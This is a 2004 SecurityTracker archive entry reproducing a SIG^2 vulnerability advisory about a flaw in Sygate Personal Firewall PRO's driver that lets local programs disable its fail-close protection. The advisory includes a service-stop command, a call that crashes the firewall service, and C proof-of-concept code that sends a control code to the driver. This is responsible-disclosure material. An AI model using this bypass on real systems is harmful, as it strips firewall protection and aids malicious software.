SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Firewall)  >   Sygate Personal Firewall Vendors:   Sygate
Sygate Personal Firewall PRO Fail-Safe Feature Can Be Bypassed By Local Users
SecurityTracker Alert ID:  1010480
SecurityTracker URL:  http://securitytracker.com/id/1010480
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 13 2004
Impact:   Host/resource access via network, Modification of system information
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): PRO 5.5 Build 2525
Description:   Tan Chew Keong of SIG^2 reported a vulnerability in Sygate Personal Firewall PRO. A local user or application can disable the firewall's fail-safe feature.

It is reported that the driver implementation (teefer.sys) contains a flaw that allows a local application to disable the fail-safe feature. Ordinarily, the fail-safe feature will block all traffic when the firewall service (smc.exe) is not loaded.

The report indicates that the driver does not authenticate received control codes to ensure that they originated from the firewall application. As a result, a local application can cause 'smc.exe' to crash and then can communicate directly with the device (\\device\Teefer) to disable the fail-safe protection.

The vendor was reportedly notified on May 30, 2004.

The original advisory is available at:

http://www.security.org.sg/vuln/spfp.html

Impact:   A local user can disable the fail-safe feature.
Solution:   No solution was available at the time of this entry. The vendor is reportedly working on a fix for an upcoming release.
Vendor URL:  soho.sygate.com/products/spf_pro.htm (Links to External Site)
Cause:   Authentication error, State error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Tested on Windows 2000 SP4

Message History:   None.


 Source Message Contents

Subject:  Sygate Personal Firewall PRO's Driver May be Disabled Locally by


SIG^2 Vulnerability Research Advisory

Sygate Personal Firewall PRO's Driver May be Disabled Locally by
Malicious Programs
by Tan Chew Keong
Release Date: 13 June 2004

http://www.security.org.sg/vuln/spfp.html

SUMMARY

Sygate Personal Firewall PRO (SPFP)
http://soho.sygate.com/products/spf_pro.htm
has redefined the personal firewall market with a multi-layered shield
of network,
content, application, and operating system security. Sygate Personal
Firewall
Pro protects your system from intrusions designed to exploit
vulnerabilities in
Internet and Intranet communication. It is the ultimate desktop security
solution
trusted by professionals and relied upon by millions of users.

SPFP has a fail-close feature that can be enabled to block all traffic when
the firewall service is not enabled. Hence, if a malicious program kills
the
firewall service (smc.exe), all traffic will be blocked. However, a flaw in
SPFP's driver implementation may be exploited locally to disable this
protection.

TESTED SYSTEM

Sygate Personal Firewall PRO 5.5 Build 2525 on Win2k SP4

DETAILS

SPFP has a fail-close feature that can be enabled to block all traffic
when the
firewall service is not enabled. Hence, if a malicious program kills the
firewall
service (smc.exe), all traffic will be blocked. This feature may be
enabled from
SPFP's GUI menu with the following sequence of commands.
(Tools->options->Security Tab->"Block all traffic while the service is
not loaded").

SPFP is implemented as a user-space service (smc.exe), and as a
kernel-space
NDIS intermediate driver (teefer.sys). The driver creates a device named
\\device\Teefer. The user-space service (smc.exe, tfman.dll)
communicates with the
kernel-space driver through this device using specific Device I/O
control codes.

The driver does not validate the source of the control codes, and hence,
malicious
programs may send control codes to the driver to disable it's fail-close
protection.

SPFP tries to prevent this by allowing only one user-space program to
open it's
driver i.e. (Exclusive = TRUE when calling IoCreateDevice). Hence, as
long as smc.exe
is running, other programs cannot open this driver. However, this may be
overcomed in
the following two ways.

   1. If the malicious program runs with Administrator privilege, it can
simply stop
      smc.exe using

         1. net stop smcservice
         2. or by using Service Control Manager APIs.

   2. If the malicious program runs with non-administrator privilege,
smc.exe may be
      crashed by exploiting the List-View Control in SPFP's GUI.

      SendMessage(hHdrControl, HDM_GETITEMRECT, 1,
(LPARAM)NON-WRITABLE_ADDR);

After stopping smc.exe, the fail-close protection may be disabled using
the following code.

    hDevice = CreateFile("\\\\.\\Teefer",
                     GENERIC_WRITE | GENERIC_READ,
                     FILE_SHARE_READ | FILE_SHARE_WRITE,
             NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("Open failed\n");
    }
    else
    {
        printf("Device opened.\n");

        char buffer[8];
        DWORD *ptr = (DWORD *)buffer;
        DWORD *ptr2 = (DWORD *)(buffer + 4);
        DWORD ret;

        *ptr = 0;
        *ptr2 = 0;

        if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
&ret, 0))
            printf("Sent.\n");

        CloseHandle(hDevice);
    }


VENDOR RESPONSE

Vulnerability will be fixed in upcoming release with additional product
engine
enhancements and performance tweaks.

DISCLOSURE TIMELINE

20 May 04 - Vulnerability Discovered
30 May 04 - Initial Vendor Notification
08 Jun 04 - Initial Vendor Response
13 Jun 04 - Public Release

GREETINGS

All guys at SIG^2 G-TEC Lab
http://www.security.org.sg/webdocs/g-tec.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC